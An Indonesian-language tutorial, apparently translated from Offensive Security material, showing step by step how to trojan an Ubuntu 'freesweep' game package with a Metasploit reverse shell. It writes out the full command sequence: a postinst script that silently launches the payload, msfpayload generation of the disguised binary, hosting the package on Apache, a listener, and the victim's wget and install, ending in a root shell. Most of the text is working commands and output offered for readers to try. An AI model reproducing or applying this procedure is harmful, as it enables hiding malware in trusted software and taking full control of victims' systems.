Dalam rangka untuk menunjukkan bahwa serangan sisi client dan trojan tidak eksklusif dengan dunia Windows, kita akan paket muatan Metasploit dengan paket deb Ubuntu untuk memberikan kita shell di Linux.

Pertama-tama kita perlu men-download paket yang kita akan menginfeksi dan memindahkannya ke direktori kerja sementara. Dalam contoh kita, kita akan menggunakan ‘freesweep’ paket, versi berbasis teks Tambang Sweeper.

[email protected]:/pentest/exploits/framework3# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
...snip...
[email protected]:/pentest/exploits/framework3# mkdir /tmp/evil
[email protected]:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
[email protected]:/pentest/exploits/framework3# cd /tmp/evil/
[email protected]:/tmp/evil#


Selanjutnya, kita perlu untuk mengambil paket ke direktori kerja dan menciptakan sebuah direktori DEBIAN untuk mengadakan tambahan yang ditambahkan kami “fitur”.

[email protected]:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
[email protected]:/tmp/evil# mkdir work/DEBIAN

Dalam direktori ‘DEBIAN’, membuat file bernama ‘control’ yang berisi berikut:

[email protected]:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers ([email protected])
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where one tries to find all the mines without igniting any, based on hints given by the computer. Unlike most implementations of this game, Freesweep works in any visual text display - in Linux console, in an xterm, and in most text-based terminals currently in use.

Kemudian buat file postinst dengan isi

[email protected]:/tmp/evil/work/DEBIAN# cat postinst
#!/bin/sh

sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &

Proses pembuatan tojans

[email protected]:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (http://www.metasploit.com).
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=192.168.1.101,LPORT=443

lhost diisi dengan ip kita yank konek jaringan kemudian port sesuai dengan keinginan kita

Kita sekarang akan membuat post-installation script kami dieksekusi dan membangun paket baru kami. ‘Work.deb’ File yang dibangun akan diberi nama sehingga kami ingin mengubah itu ‘freesweep.deb’ dan menyalin paket ke direktori root web kami.

[email protected]:/tmp/evil/work/DEBIAN# chmod 755 postinst
[email protected]:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
[email protected]:/tmp/evil# mv work.deb freesweep.deb
[email protected]:/tmp/evil# cp freesweep.deb /var/www/

start apace server

[email protected]:/tmp/evil# /etc/init.d/apache2 start

jalankan metasploit untuk membuat file trojans

[email protected]:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.1.101 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

pada target linux masukkan koment

[email protected]:~$ wget http://192.168.1.101/freesweep.deb

[email protected]:~$ sudo dpkg -i freesweep.deb

maka hasilnya pada listening

[*] Sending stage (36 bytes)
[*] Command shell session 1 opened (192.168.1.101:443 -> 192.168.1.175:1129)

ifconfig
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr:192.168.1.175 Bcast:192.168.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0x1400
...snip...

hostname
ubuntu
id
uid=0(root) gid=0(root) groups=0(root)

Selamat Mencoba

Sumber : http://www.offensive-security.com